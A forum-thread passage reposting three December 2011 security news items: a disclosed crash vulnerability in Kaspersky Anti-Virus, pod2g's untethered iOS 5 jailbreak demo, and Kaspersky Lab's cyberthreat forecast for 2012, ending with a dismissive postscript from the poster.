December 22nd, 2011, 14:41 GMT · By Eduard Kovacs

Medium severity vulnerabilities are found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process. Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept video was also published along with the disclosure.

“The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote.

It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file. According to the timeline report provided by Vulnerability Labs, Kaspersky was notified of the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed.

A while back, I had the opportunity to have a chat with Benjamin Kunz Mejri on the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing. “There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. The most vendors reply very friendly & ask us for disclosure partnership (cooperation) for future bug publications,” he said.

I have contacted Kaspersky to see what they have to say on the matter so stay tuned for an update.

Source: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia
  24. Untethered jailbreak demonstrated for iOS 5, iOS 5.1

Dec. 22, 2011 (8:25 am) By: Will Shanklin

Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require a PC connection after a reboot.

The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action.

Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.”

An untethered jailbreak for iOS 5 would be a welcome holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains.

As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be released as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long.

via pod2g

Source: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com
  25. Cyber attacks in 2012: defined targets, cyber warfare, mobile threats

22 12 2011 15:39 Corina Cailean

What will 2012 bring in terms of information security? Broadly, we should expect not only an extreme increase in targeted attacks on state institutions and large companies; it is also possible that more and more organizations will be affected by cyber incidents. In practice, the main target of cyber attackers will be governments and large corporations around the world. For us, as ordinary users, the "Achilles' heel" will be mobile phones, according to Kaspersky Lab experts, who have produced a forecast report for next year.

Alexander Gostev, author of the report "Cyberthreat Forecast for 2012", says that, for the moment, most cyber incidents affect companies and government organizations involved in arms manufacturing, financial operations, or activities related to hi-tech or scientific research. Next year, companies operating in fields such as natural resource extraction, energy, transport, food and pharmaceuticals will also be affected. From the point of view of the home user, it is important to note that the preferred targets will also include companies that provide Internet services, as well as those that deal with information security.

The attacks will be more geographically widespread next year, including Western Europe and the USA, and will affect Eastern Europe, the Middle East and Southeast Asia.

Kaspersky Lab experts predict that cybercriminals will change their attack methods in order to adapt to the competition among IT security companies, which investigate this type of attack and offer protection against it. The increased level of attention to security breaches will be one more reason why attackers will be forced to look for new tools. Conventional attack methods, involving e-mail attachments that exploit system vulnerabilities, will become increasingly ineffective, while attacks through search engines (influencing the results displayed in online searches on certain topics) will be much more popular.

Another prediction concerns attacks by hacktivist groups on state organizations and companies, which will continue in 2012 and will have a predominantly political agenda. However, "hacktivism" could be used as a diversion to hide other types of attack.

Hi-tech malware such as Stuxnet and Duqu, created with state support, will remain unique phenomena. Their appearance will be determined by international tensions between certain countries, and conflicts in cyberspace will form around the traditional confrontations: the USA and Israel against Iran, and the USA and Western Europe against China.

Basic "weapons" built to destroy data at a given moment, such as "kill switches", logic bombs and so on, will become more popular because they are easier to produce. The creation of these programs can be outsourced to private contractors used by military or government agencies. In many cases, the contractor may not know what the client's goals are.

As for threats to mobile phones, Kaspersky Lab expects Google Android to be the favourite target of the market for malicious software that attacks mobile devices, and the number of attacks exploiting vulnerabilities to grow. The appearance of the first mobile drive-by attacks and mobile botnets is also forecast. Mobile espionage will become widespread and will most likely include data theft from mobile phones and the tracking of particular people using phones or geolocation services.

Source: Cyber attacks in 2012: defined targets, cyber warfare, mobile threats

PS: It's written by a woman, I haven't read it, but this is roughly what gets propagated through the media.